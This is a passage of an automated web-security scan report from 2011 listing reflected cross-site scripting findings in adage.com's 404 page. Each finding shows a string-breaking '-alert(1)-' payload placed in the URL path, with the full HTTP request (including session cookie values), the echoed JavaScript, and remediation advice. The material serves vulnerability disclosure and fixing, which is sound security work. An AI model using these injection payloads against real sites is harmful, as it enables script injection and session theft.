Set-Cookie: HMAC=392B55BCA1E03D8535ADDEEAE867C1CCCD75E4D2; path=/
Set-Cookie: HMAC=23835443FF3E360F4A3864CD2B1E7EEFE3D1A08B; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49478
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
c="HBX0100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1291744534";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com//images46cfb"-alert(1)-"dabdda859b0/save-and-share-icons/icon-digg.png"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.
...[SNIP]...

1.17. http://adage.com//images/save-and-share-icons/icon-digg.png [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   //images/save-and-share-icons/icon-digg.png

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 50b51"-alert(1)-"91173d12182 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //images/save-and-share-icons50b51"-alert(1)-"91173d12182/icon-digg.png?1291744534 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:10:41 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=9F85EC95FC5CCF6F3A129357C0DE27649A57D444; path=/
Set-Cookie: HMAC=E5BB0B428316642056F232E3781183E669512112; path=/
Set-Cookie: HMAC=95D2467545921E0FBF0B688EA81D027414376278; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49478
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1291744534";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com//images/save-and-share-icons50b51"-alert(1)-"91173d12182/icon-digg.png"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hbx.
...[SNIP]...

1.18. http://adage.com//images/save-and-share-icons/icon-digg.png [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   //images/save-and-share-icons/icon-digg.png

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 52fec"-alert(1)-"55c76269dd8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //images/save-and-share-icons/icon-digg.png52fec"-alert(1)-"55c76269dd8?1291744534 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:11:01 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=865FD9BC847936AFFE2215B1E986016872805895; path=/
Set-Cookie: HMAC=831ADF1DB456DC5F4216608A355181A1C47583A8; path=/
Set-Cookie: HMAC=BE9A4618BD27ABBA0C848601B386AF2C59F49176; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49478
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
ox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1291744534";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com//images/save-and-share-icons/icon-digg.png52fec"-alert(1)-"55c76269dd8"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hbx.dft="y";
hbx.e
...[SNIP]...

1.19. http://adage.com//images/save-and-share-icons/icon-facebook.png [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   //images/save-and-share-icons/icon-facebook.png

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e25a7"-alert(1)-"93324f8b867 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //imagese25a7"-alert(1)-"93324f8b867/save-and-share-icons/icon-facebook.png?1291744534 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:09:25 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=8554B0B740A7DFEE6F8097323E3CD7C59ABC176A; path=/
Set-Cookie: HMAC=C01354BD03BC9F3B37AE1845F6934667D3236D01; path=/
Set-Cookie: HMAC=B8553687A487AF38670CBD42307E9CA6DCE851CA; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49482
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
c="HBX0100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1291744534";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com//imagese25a7"-alert(1)-"93324f8b867/save-and-share-icons/icon-facebook.png"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";

...[SNIP]...

1.20. http://adage.com//images/save-and-share-icons/icon-facebook.png [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   //images/save-and-share-icons/icon-facebook.png

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3dadb"-alert(1)-"a0bf3312ba0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //images/save-and-share-icons3dadb"-alert(1)-"a0bf3312ba0/icon-facebook.png?1291744534 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:09:56 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=3051D16D72C7D8E285B9A8092468FB15C43D9349; path=/
Set-Cookie: HMAC=80EE0DA1BDBB6BA1205AB558857CB90E1B1D6F5B; path=/
Set-Cookie: HMAC=4E1967BA0A0BE9780A5CB755D49A8CECF9867777; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49482
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1291744534";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com//images/save-and-share-icons3dadb"-alert(1)-"a0bf3312ba0/icon-facebook.png"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";

...[SNIP]...

1.21. http://adage.com//images/save-and-share-icons/icon-facebook.png [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   //images/save-and-share-icons/icon-facebook.png

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 926d3"-alert(1)-"2636b1944da was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //images/save-and-share-icons/icon-facebook.png926d3"-alert(1)-"2636b1944da?1291744534 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:10:24 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=C08CF54C74F5C21C98AA46D9928AFA01BD06A6C8; path=/
Set-Cookie: HMAC=4BE13DC82BDA09CFF2506A12D9EE8709E44DAD8C; path=/
Set-Cookie: HMAC=4E62AB29F3053C0ADC4A0F6B38F0248A1B4CB4E3; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49482
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
om";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1291744534";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com//images/save-and-share-icons/icon-facebook.png926d3"-alert(1)-"2636b1944da"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hbx.dft="y";
hbx.e
...[SNIP]...

1.22. http://adage.com//images/save-and-share-icons/icon-google.png [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   //images/save-and-share-icons/icon-google.png

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 44dc9"-alert(1)-"0ee88ea36e2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //images44dc9"-alert(1)-"0ee88ea36e2/save-and-share-icons/icon-google.png?1291744534 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:11:24 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=DE39BAE78E158CFEE55026AE4E2DCFC08A2EB9EF; path=/
Set-Cookie: HMAC=E70613A6312006CA98A290E1B7E16C8527D850B0; path=/
Set-Cookie: HMAC=FFFC9F13F0FC6AF9E21FE049C4367312B9239685; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49480
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
c="HBX0100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1291744534";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com//images44dc9"-alert(1)-"0ee88ea36e2/save-and-share-icons/icon-google.png"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hb
...[SNIP]...

1.23. http://adage.com//images/save-and-share-icons/icon-google.png [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   //images/save-and-share-icons/icon-google.png

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 85077"-alert(1)-"33cf11815f4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //images/save-and-share-icons85077"-alert(1)-"33cf11815f4/icon-google.png?1291744534 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:11:43 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=69D00B98A40D9843C720FC7DEF85C4484BEF5E0D; path=/
Set-Cookie: HMAC=8F671288FDBD8123BC4548CF29CCA272C6515E2F; path=/
Set-Cookie: HMAC=4183A5E5EF1D9AF3D856D00B728C487271E35227; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49480
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1291744534";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com//images/save-and-share-icons85077"-alert(1)-"33cf11815f4/icon-google.png"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hb
...[SNIP]...

1.24. http://adage.com//images/save-and-share-icons/icon-google.png [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   //images/save-and-share-icons/icon-google.png

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8a664"-alert(1)-"9cedc40d16c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //images/save-and-share-icons/icon-google.png8a664"-alert(1)-"9cedc40d16c?1291744534 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:11:55 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=9C36341DD777B3492C9C98D331E172899AF6BB16; path=/
Set-Cookie: HMAC=340A0BBAD4E1C84C0082A4D2258FFF6C693D1805; path=/
Set-Cookie: HMAC=EDCD4AA76169CC1973AD5167A3962823824F6104; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49480
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1291744534";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com//images/save-and-share-icons/icon-google.png8a664"-alert(1)-"9cedc40d16c"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hbx.dft="y";
hbx.e
...[SNIP]...

1.25. http://adage.com//images/save-and-share-icons/icon-linkedin.png [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   //images/save-and-share-icons/icon-linkedin.png

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cbc76"-alert(1)-"09d21fbc5ca was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //imagescbc76"-alert(1)-"09d21fbc5ca/save-and-share-icons/icon-linkedin.png?1291744534 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:10:59 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=207B9D24ED2318E951809D0642985DD6D9016336; path=/
Set-Cookie: HMAC=20635416B91CF35C473AFB2953205E1D5CAC33C1; path=/
Set-Cookie: HMAC=78345DB9E2096DBBA90FED3C57754887982E7B58; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49482
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
c="HBX0100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1291744534";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com//imagescbc76"-alert(1)-"09d21fbc5ca/save-and-share-icons/icon-linkedin.png"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";

...[SNIP]...

1.26. http://adage.com//images/save-and-share-icons/icon-linkedin.png [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   //images/save-and-share-icons/icon-linkedin.png

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7e33a"-alert(1)-"065a4278d48 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //images/save-and-share-icons7e33a"-alert(1)-"065a4278d48/icon-linkedin.png?1291744534 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:11:13 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=C36A5F70A831BE679C3F43FB146B3909B6A679A6; path=/
Set-Cookie: HMAC=C92FD2C4F0E5060E0F00FBD881EBC5D12F77531E; path=/
Set-Cookie: HMAC=20A26BC585B339550F9CAB2B6594BCC5E19750BA; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49482
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1291744534";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com//images/save-and-share-icons7e33a"-alert(1)-"065a4278d48/icon-linkedin.png"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";

...[SNIP]...

1.27. http://adage.com//images/save-and-share-icons/icon-linkedin.png [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   //images/save-and-share-icons/icon-linkedin.png

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 56556"-alert(1)-"6b88251e67d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //images/save-and-share-icons/icon-linkedin.png56556"-alert(1)-"6b88251e67d?1291744534 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
